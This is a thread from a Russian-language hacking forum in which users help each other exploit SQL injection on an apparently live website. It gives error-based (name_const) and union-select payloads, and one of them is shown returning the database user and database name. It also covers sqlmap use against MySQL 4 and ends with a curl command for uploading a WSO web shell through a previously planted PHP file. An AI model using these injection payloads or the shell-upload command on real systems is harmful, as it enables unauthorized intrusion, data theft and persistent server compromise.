ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
28.09.2014, 06:36
|
|
Guest
Сообщений: n/a
Провел на форуме:
5993
Репутация:
0
|
|
Подскажите, в данном случае:
Код:
Code:
/about/news/1'/
Возможно ли раскрутить SQL и добиться вывода инфы? Любым способом, error-based, blind, time-based и так далее.
Все векторы перепробовал, никак не получается. |
|
|
|
28.09.2014, 14:50
|
|
Guest
Сообщений: n/a
Провел на форуме:
5993
Репутация:
0
|
|
Сообщение от er9j6@
er9j6@ said:
как вариант
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][/COLOR]
/about/news/1'and(select*from(select(name_const(version(),1)), name_const(version(),1))a)and'/ А если version() заменить на user() или database(), то какой результат получим?
Интересует рабочий запрос, а работоспособность вектора с name_const определяется как раз по user(), или любого произвольного значения а не в выводе версии.
Хотя, если ты осилил раскрутку через name_const то покажи как что то кроме версии вытащить.
|
|
|
|
28.09.2014, 16:18
|
|
Guest
Сообщений: n/a
Провел на форуме:
23349
Репутация:
45
|
|
А почему бы не передать комментарий в raw форме, как это сделано с кавычкой ?
Код:
Code:
/about/news/1123123')union(select(1),2,3,4,5,6,user(),8,database(),10)#/
:User: u74960@10.8.1.153
Database: u74960 |
|
|
|
28.09.2014, 16:58
|
|
Guest
Сообщений: n/a
Провел на форуме:
5993
Репутация:
0
|
|
Сообщение от Inoms
Inoms said:
А почему бы не передать комментарий в raw форме, как это сделано с кавычкой ?
Код:
Code:
/about/news/1123123')union(select(1),2,3,4,5,6,user(),8,database(),10)#/
:User: u74960@10.8.1.153
Database: u74960 Спасибо большое! Не додумался до посылки сырых запросов. Выручил.
|
|
|
|
03.10.2014, 14:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
20084
Репутация:
0
|
|
как заставить sqlmap перебирать columns посимвольно? Предлогает только перебор по словарю
Mysql = 4.1
пробовал добавлять --technique=B , --technique=T
|
|
|
|
03.10.2014, 15:52
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от erwap
erwap said:
как заставить sqlmap перебирать columns посимвольно? Предлогает только перебор по словарю
Mysql = 4.1
пробовал добавлять --technique=B , --technique=T
в 4ой ветке нету Information_schema. Соответственно - ты не можешь производить операции считывания имени таблиц через функции mid(), substr(), substring(), left(), right() из системной таблицы, тк самой такой таблицы содержащей имена всех таблиц просто напросто нет.
Вывод - не заставишь. Для ветки 4.* такой технологии нет.
|
|
|
03.10.2014, 16:32
|
|
Guest
Сообщений: n/a
Провел на форуме:
20084
Репутация:
0
|
|
Сообщение от BigBear
BigBear said:
в 4ой ветке нету Information_schema. Соответственно - ты не можешь производить операции считывания имени таблиц через функции mid(), substr(), substring(), left(), right() из системной таблицы, тк самой такой таблицы содержащей имена всех таблиц просто напросто нет.
Вывод - не заставишь. Для ветки 4.* такой технологии нет.
Да я в курсе насчет этого, есть же бинарный поиск посимвольно, но почему то скульмап мне предлогает столбцы подбирать перебором через словарь.
ЗЫ: time-based, boolean-based я руками не осилил, поэтому и приходится изощряться
|
|
|
|
03.10.2014, 17:00
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от erwap
erwap said:
Да я в курсе насчет этого, есть же бинарный поиск посимвольно, но почему то скульмап мне предлогает столбцы подбирать перебором через словарь.
ЗЫ: time-based, boolean-based я руками не осилил, поэтому и приходится изощряться
поэтому и предлагает перебирать по словарю. information_schema там нет. бинарный поиск посимвольно работает только если есть что искать
|
|
|
|
08.10.2014, 01:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
0
Репутация:
5
|
|
На сайт загружен php файл с таким содержимым:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
Как с его помощью выполнить, или загрузить туда wso шелл? На примере готовой команды пожалуйста. |
|
|
|
08.10.2014, 08:24
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Грабитель, Для MySQL 4 в настоящее время нет вектора атак, позволяющего получить списки таблиц (в select запросе) подобно чтению information_schema в MySQL 5. Единственный метод - брут таблиц по словарю, исключая редкие нюансы, например такие как:
- Возможность доступа к ФС
- Наличие таблицы с отладочной информацией
- Возможность исполнения нескольких запросов за один раз (при использовании mysqli::multi_query, etc)
- etc
Сообщение от TIGERSSS
TIGERSSS said:
На сайт загружен php файл с таким содержимым:
Как с его помощью выполнить, или загрузить туда wso шелл? На примере готовой команды пожалуйста.
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]curl[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]F[/COLOR][COLOR="#DD0000"]"F1l3=@/home/user/shell/wso2.php"[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]F[/COLOR][COLOR="#DD0000"]"Name=/var/www/wso2.php"[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//site.com/file.php
[/COLOR][/COLOR]
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
